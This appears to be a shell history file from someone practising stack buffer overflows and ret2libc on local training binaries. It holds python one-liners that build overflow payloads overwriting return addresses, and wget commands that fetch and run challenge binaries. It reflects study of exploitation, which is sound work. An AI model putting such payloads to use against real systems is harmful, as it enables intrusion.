- cmd: cd !~
  when: 1621785667
- cmd: wget "https://raw.githubusercontent.com/dylanaraps/pfetch/master/pfetch"
  when: 1621785715
- cmd: bash pfetch
  when: 1621785720
  paths:
    - pfetch
- cmd: vim stack-example.c
  when: 1621814832
- cmd: cc stack-example.c
  when: 1621814840
  paths:
    - stack-example.c
- cmd: checksec ./a.out
  when: 1621814846
  paths:
    - ./a.out
- cmd: chmod +x stack-example
  when: 1621826061
  paths:
    - stack-example
- cmd: apt install strace
  when: 1621826079
- cmd: sudo apt install strace
  when: 1621826086
- cmd: strace
  when: 1621826112
- cmd: ./stack-example
  when: 1621826674
- cmd: strace ./stack-example
  when: 1621826679
  paths:
    - ./stack-example
- cmd: cyclic 20
  when: 1621827087
- cmd: cyclic 20 | ./stack-example
  when: 1621827093
- cmd: cyclic 40 | ./stack-example
  when: 1621827105
- cmd: cyclic 40 | strace ./stack-example
  when: 1621827110
  paths:
    - ./stack-example
- cmd: python3
  when: 1621827127
- cmd: cyclic 40
  when: 1621827134
- cmd: python3 -c 'print("aaaabaaacaaadaaaeaaafaaag" + "\\xd3\\xc0\\xad\\xde")' | ./stack-example
  when: 1621827183
- cmd: python3 -c 'print("aaaabaaacaaadaaaeaaafaaag" + "\\xd3\\xc0\\xad\\xde")' | strace ./stack-example
  when: 1621827189
  paths:
    - ./stack-example
- cmd: python3 -c 'print("aaaabaaacaaadaaaeaaafaaagaaah" + "\\xd3\\xc0\\xad\\xde")' | strace ./stack-example
  when: 1621827213
  paths:
    - ./stack-example
- cmd: python3 -c 'print("aaaabaaacaaadaaaeaaafaaagaaahaaai" + "\\xd3\\xc0\\xad\\xde")' | strace ./stack-example
  when: 1621827221
  paths:
    - ./stack-example
- cmd: python3 -c 'print("aaaabaaacaaadaaaeaaafaaag"+"\\xd3\\xc0\\xad\\xde"+"aaai" + "\\xd3\\xc0\\xad\\xde")' | strace ./stack-example
  when: 1621827246
  paths:
    - ./stack-example
- cmd: checksec
  when: 1621827260
- cmd: checksec ./stack-example
  when: 1621827263
  paths:
    - ./stack-example
- cmd: cat /proc/sys/kernel/randomize_va_space
  when: 1621827501
  paths:
    - /proc/sys/kernel/randomize_va_space
- cmd: pwndbg
  when: 1621828975
- cmd: cd /root
  when: 1621830886
  paths:
    - /root
- cmd: sudo su
  when: 1621830890
- cmd: ls -la
  when: 1621832156
- cmd: python3 -c 'print("aaaabaaacaaadaaaeaaafaaag"+"\\xd3\\xc0\\xad\\xde"+"aaai" + "\\xd3\\xc0\\xad\\xde")' > /tmp/file
  when: 1621832188
- cmd: python3 -c 'print("aaaabaaacaaadaaaeaaafaaagaaah"+"\\xd3\\xc0\\xad\\xde"+"aaai" + "\\xd3\\xc0\\xad\\xde")' > /tmp/file
  when: 1621833124
- cmd: sudo apt install python2
  when: 1621833174
- cmd: python -c 'print "aaaabaaacaaadaaaeaaafaaagaaah"+"\\xd3\\xc0\\xad\\xde"+"aaai" + "\\xd3\\xc0\\xad\\xde" ' > /tmp/file
  when: 1621833185
- cmd: python2 -c 'print "aaaabaaacaaadaaaeaaafaaagaaah"+"\\xd3\\xc0\\xad\\xde"+"aaai" + "\\xd3\\xc0\\xad\\xde" ' > /tmp/file
  when: 1621833189
- cmd: python2 -c 'print "aaaabaaacaaadaaaeaaafaaagaaa"+"\\xd3\\xc0\\xad\\xde"+"aaai" + "\\xd3\\xc0\\xad\\xde" ' > /tmp/file
  when: 1621833223
- cmd: xxd /tmp/file
  when: 1621833224
  paths:
    - /tmp/file
- cmd: python2 -c 'print "aaaabaaacaaadaaaeaaafaaagaaa"+"\\xd3\\xc0\\xad\\xde"+"aaai" + "\\x4b\\x84\\x04\\x08" ' > /tmp/file
  when: 1621833299
- cmd: python2 -c 'print "aaaabaaacaaadaaaeaaafaaagaaa"+"\\x4b\\x84\\x04\\x08" ' > /tmp/file
  when: 1621833338
- cmd: python2 -c 'print "aaaabaaacaaadaaaeaaafaaagaaa"+"\\x4b\\x84\\x04\\x08" + "iaaa" ' > /tmp/file
  when: 1621833385
- cmd: python2 -c 'print "aaaabaaacaaadaaaeaaafaaagaaa"+"\\x8b\\x84\\x04\\x08" + "iaaa" ' > /tmp/file
  when: 1621833403
- cmd: python2 -c 'print "aaaabaaacaaadaaaeaaafaaagaaa"+"\\x8b\\x84\\x04\\x08"' > /tmp/file
  when: 1621834555
- cmd: gdb ./stack-example
  when: 1621834556
  paths:
    - ./stack-example
- cmd: cd ~
  when: 1621937916
- cmd: gdb
  when: 1621937920
- cmd: cyclic 400 | ./stack-example
  when: 1621937931
- cmd: wget "https://wiki.bi0s.in/pwning/return2libc/stack-example-shell"
  when: 1621938046
- cmd: ls
  when: 1621938049
- cmd: chmod +x stack-example-shell
  when: 1621938054
  paths:
    - stack-example-shell
- cmd: ./stack-example-shell
  when: 1621938057
- cmd: gdb stack-example-shell
  when: 1621938075
  paths:
    - stack-example-shell
- cmd: apt install python2
  when: 1621938121
- cmd: sudo apt install python2
  when: 1621938124
- cmd: python2 -c 'print "a"*0x10+"\\x8b\\x84\\x04\\x08"' > /tmp/file
  when: 1621938145
- cmd: gdb stack-example-shell
  when: 1621938148
  paths:
    - stack-example-shell
- cmd: python2 -c 'print "a"*0x10+"\\xcb\\x84\\x04\\x08"' > /tmp/file
  when: 1621938163
- cmd: cat /tmp/file | ./stack-example-shell
  when: 1621938180
  paths:
    - /tmp/file
- cmd: cat /tmp/file | strace ./stack-example-shell
  when: 1621938185
  paths:
    - /tmp/file
    - ./stack-example-shell
- cmd: python2 -c 'print "a"*0x14+"\\xcb\\x84\\x04\\x08"' > /tmp/file
  when: 1621938198
- cmd: cat /tmp/file | strace ./stack-example-shell
  when: 1621938200
  paths:
    - /tmp/file
    - ./stack-example-shell
- cmd: python2 -c 'print "a"*0x14+"\\xcb\\x84\\x04\\x08"' > /tmp/file
  when: 1621938212
- cmd: cat /tmp/file | ./stack-example-shell
  when: 1621938216
  paths:
    - /tmp/file
- cmd: gdb stack-example-shell
  when: 1621938242
  paths:
    - stack-example-shell
- cmd: cat /tmp/file; and cat | ./stack-example-shell
  when: 1621938275
  paths:
    - /tmp/file
- cmd: cd ~
  when: 1621939371
- cmd: checksec ./stack-example-shell
  when: 1621939377
  paths:
    - ./stack-example-shell
- cmd: wget "https://wiki.bi0s.in/pwning/return2libc/ret2libc"
  when: 1621939437
- cmd: ls
  when: 1621939439
- cmd: chmod +x ret2libc
  when: 1621939444
  paths:
    - ret2libc
- cmd: cd ~
  when: 1621940685
- cmd: ls
  when: 1621940685
- cmd: gdb ./ret2libc
  when: 1621940689
  paths:
    - ./ret2libc
- cmd: cd ~
  when: 1621941182
- cmd: ls
  when: 1621941182
- cmd: gdb ./ret2libc
  when: 1621941185
  paths:
    - ./ret2libc
